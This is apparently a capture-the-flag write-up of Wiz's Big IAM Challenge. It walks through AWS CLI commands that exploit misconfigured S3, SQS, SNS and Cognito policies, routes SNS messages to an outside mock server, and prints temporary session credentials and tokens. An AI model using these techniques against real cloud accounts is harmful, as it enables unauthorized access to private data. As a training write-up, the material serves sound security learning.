Hackwekend Session 5 - Cloud Security (AWS IAM Policy)

Yo, Hello Hello @everyone. It's been a good week to bring back Hackwekend. Continuously, today we will learn and solve challenge CTF of Wiz.io about Cloud Security, Target today is IAM. Let digest bruh :smiling_face_with_smiling_eyes_and_hand_covering_mouth:

Challenge Link: BigIAMChallenge

Challenge 1: Buckets of Fun

Description: We all know that public buckets are risky. But can you find the flag?

At first, let talk about the challenge. Base on the description and IAM Policy we know about the flag will stay on Bucket, therefore we need to know about Bucket, How the Bucket work, digest inside that.

Analysis

Learn more about S3 with What is S3 ?

(TL;DR) Amazon Simple Storage Service (Amazon S3) is an object storage service that offers industry-leading scalability, data availability, security, and performance.Use Amazon S3 to store and protect any amount of data for a range of use cases, such as data lakes, websites, mobile applications, backup and restore, archive, enterprise applications, IoT devices, and big data analytics. Amazon S3 provides management features so that you can optimize, organize, and configure access to your data to meet your specific business, organizational, and compliance requirements.

I can brief about the S3, It's kind simple location for put your file, data and anything into that and It's totally on AWS. It means on this challenge you just figure out how to get the data from bucket

Solve and retrieve the flag

You will need some help about aws s3 documentaion

Base on the IAM Policy, you have role to get and list the bucket, it mean you need to do

First of all, you need to list s3 objects for find the what flag file you want, and you can see we have additions end point files. Do trigger s3 ls command and you will know flag file

aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/

The flag1.txt is exposing, next step is reading contents inside flag1.txt, use cp command to take others work :smiling_face_with_smiling_eyes_and_hand_covering_mouth:

aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -

Flag: {wiz:exposed-xxxxxxxxx-as-usual}

Conclusion

With first challenge, It looks basicly, you can learn how to list and get contents inside bucket object. So with S3 you expose to Internet and not protect anything, your secret can be leaked. Thus, you need to apply the policy into s3 for secure what access can perform

Learn more about that with Security best practices for Amazon S3

Challenge 2: Google Analytics

Description: We created our own analytics system specifically for this challenge. We think it's so good that we even used it on this page. What could go wrong? Join our queue and get the secret flag.

Analysis

Next stage, on this challenge you need to know about sqs, Message queue service of AWS.

(TL;DR) Amazon Simple Queue Service (Amazon SQS) offers a secure, durable, and available hosted queue that lets you integrate and decouple distributed software systems and components. Amazon SQS offers common constructs such as dead-letter queues and cost allocation tags. It provides a generic web services API that you can access using any programming language that the AWS SDK supports.

Simplely, you need to figure out what sqs working, receive message in the queue and read the contents inside, Flag will expose

Solve and retrieve the flag

I just read couple walkthrough, you can find the hard way to play this challenge via this write-up

With me, i just solve this challenge kind simple way, but you need to know about IAM policy we have send-message & receive-message. Googling about this stuff, you will have documentation

First of all, I try to retrive what message we got from queue, maybe interesting is inside and right expectation you will found the hidden URL, with receive-message command (FACT: This command is finding inside the documentation of receive-message command, guess and truth :smile:)

aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 --attribute-names All --message-attribute-names All --max-number-of-messages 10

Access Body URL for doing access bucket to reach flag contents

curl https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html

Flag: {wiz:you-are-xxxxxxx-of-the-queue}

Conclusion

Through this challenge, you will learn how about sqs service of AWS, maybe receive is enough for this challenge but you can try another to create queue message with send. And another meaning, you need to secure and put IAM for your service on AWS, It will best practice for securing any service

Learn more about with Security in Amazon SQS

Challenge 3: Enable Push Notifications

Description: We got a message for you. Can you get it?

Analysis

On this challenge, we will learn about a new service SNS, Simple Notification Service of AWS

(TL;DR) Amazon Simple Notification Service (Amazon SNS) is a managed service that provides message delivery from publishers to subscribers (also known as producers and consumers). Publishers communicate asynchronously with subscribers by sending messages to a topic, which is a logical access point and communication channel. Clients can subscribe to the SNS topic and receive published messages using a supported endpoint type, such as Amazon Data Firehose, Amazon SQS, AWS Lambda, HTTP, email, mobile push notifications, and mobile text messages (SMS).

It requires you submit publisher for topic and send it to your server, and maybe contents is staying on this messsage return.

Solve and retrieve the flag

To do the job like expectation, you need to know about manipulation the request, It means you make a mock server where you can receive GET and POST request to server. Some application which you can use on situation like

1. Beeceptor : API Mocking
2. Webhook.site : Generates free, unique URLs and e-mail addresses and lets you see everything that’s sent there instantly. (Usage: Steal cookies, bypass authorized, …)

On this situaion, I don't know why i can use webhook.site to receive message submit from subscribe, so Beeceeptor come like coincident instead for webhooksite

To subscribe endpoint for topic, you can figure out the method with documentation, it use sns subscribe and submit nofication can be beeceptor or webhook.site

Subscribe with webhook.site (Very long to receive message confirmation)

Subscribe with beeceptor (Sorry not have image because of the broken of beeceptor in written process)

aws sns subscribe \
    --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications \
    --protocol https \
    --notification-endpoint https://hissss.free.beeceptor.com/@tbic.wiz.io

Wait some few second, you will receive this message with request about subscription confirmation

{
  "Type": "SubscriptionConfirmation",
  "MessageId": "f627ce34-b444-467b-85da-16e7552ce235",
  "Token": "2336412f37fb687f5d51e6e2425ba1f2557c425dcc2daea6d66fe3659c617229f8ef892c4e6966c741337fe049776a677ffb1a60e1a3535c75b49b3be3feabce2cc2da9a993314cdb3da62541cc2f124c645e9a2698a36fc1243b88b827d15f345d4aa097b5fb518c9fa1d8db2aeba67f9a20b54b950f36eff8883de9e5c15bf",
  "TopicArn": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
  "Message": "You have chosen to subscribe to the topic arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications.\nTo confirm the subscription, visit the SubscribeURL included in this message.",
  "SubscribeURL": "https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications&Token=2336412f37fb687f5d51e6e2425ba1f2557c425dcc2daea6d66fe3659c617229f8ef892c4e6966c741337fe049776a677ffb1a60e1a3535c75b49b3be3feabce2cc2da9a993314cdb3da62541cc2f124c645e9a2698a36fc1243b88b827d15f345d4aa097b5fb518c9fa1d8db2aeba67f9a20b54b950f36eff8883de9e5c15bf",
  "Timestamp": "2024-04-25T07:50:45.994Z",
  "SignatureVersion": "1",
  "Signature": "rE1iclhXRmTYOX1n1G+vifwWfIoFt1u0R8N0sRjN4GdYnTh/Jq904DN6tKCYw5AcMIezss6Qe2iW7U9zvjzJAcX9QPBOvmQl6sPYon8/ygs8MhIoGskl3Vf3DsbdIgnZmoRVHJgFZRPrFV+kzMZa3i3YpG1iEjyAf1cM0igtLd5nXF43Je9XPOLiqyGH9QDDS8cM0HCWVBuGPETBexfcItioclDBQ8VKMTWawAtmdqhPTu9qrwcvDTsdGhPJ5qbKcpGt4bG4SxlpXVD/bZ3y9xGm0RltrksQ0kT8iuuVMdxDHewM7I7ZZstYEn2T7mSb95q2G1zPWXkyyao+KXYW+Q==",
  "SigningCertURL": "https://sns.us-east-1.amazonaws.com/SimpleNotificationService-60eadc530605d63b8e62a523676ef735.pem"
}

Use subcribe URL to apply the confirm

curl https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications&Token=2336412f37fb687f5d51e6e2425ba1f2557c425dcc2daea6d66fe3659c617229f8ef892c4e6966c741337fe049776a677ffb1a60e1a3535c75b49b3be3feabce2cc2da9a993314cdb3da62541cc2f124c645e9a2698a36fc1243b88b827d15f345d4aa097b5fb518c9fa1d8db2aeba67f9a20b54b950f36eff8883de9e5c15bf

Wait some few second, message return the flag on your webhook or beeceptor site

Flag: {wiz:always-xxxxxxx-asterisks}

Conclusion

Through this challenge, you will learn and figure out how the sns work, how can you subscribe the topic and get the message return with mock-site or webhook-site.

Learn more about how to protect Amazon SNS security best practices

Challenge 4: Admin only?

We learned from our mistakes from the past. Now our bucket only allows access to one specific admin user. Or does it?

Analysis

This challenge ask you about list and get the contents in S3 but more secure, You can learn about s3 on first challenge

When check the condition, you have additional ARN with ForAllValues, and you need to bypass and list the bucket

Solve and retrieve the flag

After focus about the additional ARN, I figure out we need to bypas over s3 authentication, and solution can be Diving Deeply into IAM Policy Evaluation – Highlights from AWS re:Inforce IAM433

The problem is the usage of the ForAllValues operator! When the key is absent from the authorization context (as with a role that is not tagged with the key “Team”), the condition evaluates to true. Formally speaking this is because the empty set is a subset of all sets. “For all values in A x is true” is true if the group A is the empty set.

It mean when we not set the sign request, credential is not submit with --no-sign-request flag, and luckyly s3 bucket support to bypass this situation :smiling_face_with_smiling_eyes_and_hand_covering_mouth:

aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request

Get the name file, submit the cp command to getting the contents

aws s3 cp s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt --no-sign-request -

Flag: {wiz:principal-arn-xxx-xxx-xxx-you-think}

Conclusion

Through this challenge, not anything is very secure, you can make misconfiguration and mistake will occur, very carefully when use ForAllValues.

To secure that, you need to read Authorization context: Principal evaluation to understand how IAM should be apply or not, figure out the different and find the best match condition which require for your service

Challenge 5: Do I know you?

Description: We configured AWS Cognito as our main identity provider. Let's hope we didn't make any mistakes.

Analysis

On this challenge, you will work with new service identity cognito of AWS

(TL;DR) Amazon Cognito is an Amazon Web Services product that controls user authentication and access for mobile applications on internet-connected devices. The service saves and synchronizes end-user data, which enables an application developer to focus on writing code instead of building and managing the back-end infrastructure. This can accelerate the mobile application development process.

It mean you need to use cognito to authentication your shell or get identity for access to private bucket

Solve and retrieve the flag

First of all, you need to check out the raw of script, IDK about it but it's CTF challenge and why you need to do this work, and some thing indentity hide in background. Use F12 to view that or viewsource://. The identity-pool-id will expose

IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"

After view policy, you know you have full role of aws cognito it mean you need to use cognito for escalate permission, and yeah to get identity with cognito you can use get-id to read the IdentityID

aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b 

{
    "IdentityId": "us-east-1:157d6171-xxxxx-xxxx-xxxx-70ee00d8a205"
}

Get the IdentityID, It's really a good new. Reaching to next step to get full profile to authentication applications, it mean use can use IdentityID for get credentials for cognito user, with command get-credentials-for-identity

aws cognito-identity get-credentials-for-identity --identity-id us-east-1:157d6171-eeb7-c4b4-26e9-70ee00d8a205

{
    "IdentityId": "us-east-1:157d6171-eeb7-c4b4-26e9-70ee00d8a205",
    "Credentials": {
        "AccessKeyId": "ASIARK7LBOHXOIRTUPHO",
        "SecretKey": "seu7OTd212HGes3bbYo0ZfE9MXukchMDTtPlZPE7",
        "SessionToken": "IQoJb3JpZ2luX2VjEKn//////////wEaCXVzLWVhc3QtMSJGMEQCIDjCawLxtiPwlu6pnUH7VEb77v59A5jt+G9oVZpWX1/KAiAcKr+LNP0E4hgqDnm5hPDwuvAx+MsLG4oTyG2/4R+JlyrRBQjy//////////8BEAA
aDDA5MjI5Nzg1MTM3NCIMh2JDoW8l0odiidmPKqUFsbOWeCSlBCrJu10OZkyVs+fk4U6F6OHrub0z+zRtw2JStCgXxC4C3o9Dhp01Pz8TNQ9/4zyE8NOZBsSE1aPGlHlwNJuykK1p0QMVXsxTVMfoNzU9NNFlAZGqGY6jFrxSrci0M2FxaQCr6z5bTh4
tEPBCS/8PAr6sKel3Lv5GbILTNxXgsDi4yxT94VNaqKDlNPAdQ2+ujgS87u2vZh6Tw2yk0fFQlPVri57RRl6YUvjwsN9tTHx7mq5qUy/tqkrW60BERDTbw7aheTXaFb5hqLi+xatmqgHoMM5PY6hdaEpOzB2EpzWqZ4bd489fExOqKoH0I+gXYd8kRCG
8vdLr5G7C3MHNocC+IXtzggyP/rq9h288aN+zu3+8kmmGqQDAHp/J33TcX3EQCaqHJsjzwIlhebf5XAWAdmtRo8OFAsZi/9x41YAJPmYfrVQgrCKiFHh55cTYsg9icR1D5QIn0b7vNOx3I17K3ETpwIZQ968cAhLEsuhBlo3T442IBy5nYEYMpG3MGV9
Rd9qrvcpQMqKaasE3ewY47XFvRf3fHHBTojXSYZnQRElPk2iYICowUcc4SzF1/e4FT/KinmZQHR/h455G2f7/J5k7UMhQfk/AvVcrCjeWu1Qh+czY6AdJqVKcPCqSNWznWZL3OPXNTCP7YeSYfnBCLJLumlQFXpo7lgKD2469eW0bI6OreF1+bwmGaEI
s+aiG45Nb42FV8c/bF3Gsf0H7p6MHwptH3UOuu1piyB0ApyEWt6dWgxd6PFm7X50wbrTp5vpHPMwZHzuFVYjBG3ycWIam4+nXGhzzBVh0mlbTAev0xap9hPHgg6uy64BhZr9crXexPvcH6gIZ7aUNLov1PwfWLpqvB25wNNLZaJ1zFu5S0tMHPn3gYmh
kLPEwpfO5sQY63wLC7Q8QvTOKH+gQCY9KkWzz7EgKyRIPPn06P2sYGgFqYZHl5UHxXXDWi1QVEUaIN6bcfDg0qohntu6LoygH1q0SyB7ZSkp6Rkuv5VEyWs7ju6pFxdiE2JalUA7JQWEnHw1I6XUutegYPxIS/Cq/JKA4Zs14xU3pIHTHsK091pT49Eq
eA+g0xVOPTWatAIQsukrHJ8DpP7+3jIaUEdkEvmzi+Q8l0xf6ERRXPn72cAVO4xcbibnF4i6hTNoBLD2FzKeEDD3NtONBlJAfkIsxspL/RuBiuJjCBujm9dGoZD68oCyM7AT0LMELvwEYhY4JugdDAS1gXeXMn1ESlq6PR86Dt+r2q/Nvz4R9vx6Es8U
pdT7DrD0eRSmTp3Z8Z/xg1sn8E/H3mqQVLa+sez4XwVzf/XhUFieS+N2ulACFqA8gME369Amq4hl/DJgC+31srQA2Qcd6BzcZLQqDloZiURY=",
        "Expiration": 1714325429.0
    }
}

You can save this credential into shell or overwrite environment to apply this role for current shell, but not like dream, you must be run configure to set this up :laughing: :laughing: :laughing:

aws configure --profile challenge5

It tough to said that you will need aws on your shell to perform this command because you will not allow to run this command on that shell, IDK (Couple day ago i can but currently it not, waste much time for figure out the reaso )

Easily, Save some the token and export them to environment for authentication, very easily read about that on documentation

After export env variable for authentication AWS-cli, you can check about aws role with sts command

aws sts get-caller-identity

So other works is pretty easily, you can list bucket contents and read that flag

# List obj in bucket
aws s3 ls s3://wiz-privatefiles

# Get the contents from flag.txt
aws s3 cp s3://wiz-privatefiles/flag1.txt -

Flag: {wiz:incognito-xxxx-xxx-suspicious}

Conclusion

Awesome challenge, you learn about how the mobile or external can authentication with cognito of aws, learn about how we can use congito to create the variables for connect AWS

Learn more about how to secure cognito with Security in Amazon Cognito

Challenge 6: One final push

Description: Anonymous access no more. Let's see what can you do now. Now try it with the authenticated role: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role

Analysis

On this challenge, It's a level up of Challenge 5, you need to figure out the way to assume webidentity - another way to authentication aws with sepecify role

Solve and retrieve the flag

First of all, with word of challenge how to assume the role, you need to figure out this challenge that kind same as challenge 5. Easily, you have the identity-pool-id in IAM Policy, Just need to get-id from cognito

aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b

{
    "IdentityId": "us-east-1:157d6171-eef0-cec9-1180-962565110331"
}

Next step, get open-id for assume role with web-identity instead of get the credentials, because you will not have permission (I think so :smile:) like challenge 5

Experiment: Walkthrough step like challenge 5, and you will get the identity like this

You will sad and disappointed about that situation, you will fail to authentication with get-credentials-for-identity, it require web-identity

First of all, you need to know requirement of assume role commmand, assume-role-with-web-identity

It require, --role-arn <value> --role-session-name <value> --web-identity-token <value>

• role-arn : arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role
• role-session-name <base-on-decision>
• web-identity-token: You need to learn how to use this with documentation

So It mean you can use 0Auth 2.0 token or openid connect id token to provide webidentity. It mean you can use cognito-identity to provide your openid token. You will use get-open-id-token to generate openid token for your shell

aws cognito-identity get-open-id-token --identity-id us-east-1:157d6171-eef0-cec9-1180-962565110331

{
    "IdentityId": "us-east-1:157d6171-eef0-cec9-1180-962565110331",
    "Token": "eyJraWQiOiJ1cy1lYXN0LTE1IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWVmMC1jZWM5LTExODAtOTYyNTY1MTEwMzMxIiwiYXVkIjoidXMtZW
FzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3M
TQzMjQ0NDEsImlhdCI6MTcxNDMyMzg0MX0.N2fsrW6atXMq42TW4BqnDLGLwVm4I33RqPR5gIm5WUBS8buJh7m-4cbsDPCAr6xcHC6TmB0eMYe3MRUyZaPkjjd2meWCCB438meSVaU35s87m0-Cs8VZmVvJcKE-Rn-Ol5rm
8nL0hVt2NUG9y4gGYW4gvUh7SBfj-wvRAF_giAwmV6sqLabP2uX32aSxZbFdFdL-XAdnEM-KA5mdRdxyqyqCJG18ZPfqZ_9bVpuCKsr3t42UEcqvVS0DUZwYVJCx4qX1i88aTFvDbVsBS9OU6T_BX3fOhlWBjLF1VTlTs0n
bGkfFnNVzwB8_dzAYZ0vWTADg-R_8PY9BAtWZkG26zQ"
}

Done, next step we will assume currently shell to role with web-identity token

aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name chal6 --web-identity-token "eyJraWQiOiJ1cy1lYXN0LTE1IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWVmMC1jZWM5LTExODAtOTYyNTY1MTEwMzMxIiwiYXVkIjoidXMtZW
FzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3M
TQzMjQ0NDEsImlhdCI6MTcxNDMyMzg0MX0.N2fsrW6atXMq42TW4BqnDLGLwVm4I33RqPR5gIm5WUBS8buJh7m-4cbsDPCAr6xcHC6TmB0eMYe3MRUyZaPkjjd2meWCCB438meSVaU35s87m0-Cs8VZmVvJcKE-Rn-Ol5rm
8nL0hVt2NUG9y4gGYW4gvUh7SBfj-wvRAF_giAwmV6sqLabP2uX32aSxZbFdFdL-XAdnEM-KA5mdRdxyqyqCJG18ZPfqZ_9bVpuCKsr3t42UEcqvVS0DUZwYVJCx4qX1i88aTFvDbVsBS9OU6T_BX3fOhlWBjLF1VTlTs0n
bGkfFnNVzwB8_dzAYZ0vWTADg-R_8PY9BAtWZkG26zQ"

(Warning) I make it but at least, format is terrible so you need to careful about that, one more thing you need to concern because IdentityID and Token have limit time

Like chal5, export env for authentication your aws-cli. after that you will assume role completely

After export env variable, use sts to check your authentication

Completely all step above, you need to define what s3 to open and contents of bucket, easily like challenge 1

# Find the s3 of root directory
aws s3 ls s3://

Access and read content of flag inside the last challenge

aws s3 ls s3://wiz-privatefiles-x1000/

aws s3 cp s3://wiz-privatefiles-x1000/flag2.txt -

Flag: {wiz:open-sesame-xxx-xxx-xxx-say-openid}

Conclusion

Through this challenge, you can learn a new way to authentication you account with assume role with web-identity, cool methodology and easily to understand.

Conclusion

That all for today, I hope you and me learn a newthing about IAM, Policy and methodology for authentication your application. AWS is very cool stuff cloud environment with unique technical, with me AWS can bring you more knowledge about Identity, Authentication, Service and new awesome theory. :smoking:

What a hackwekend is ending, and can be on next session we will continue learning Cloud security with Wiz.io about K8s Networking. See you again on that, Stay safe and enjoy hacking, be back soon :smiling_face_with_smiling_eyes_and_hand_covering_mouth: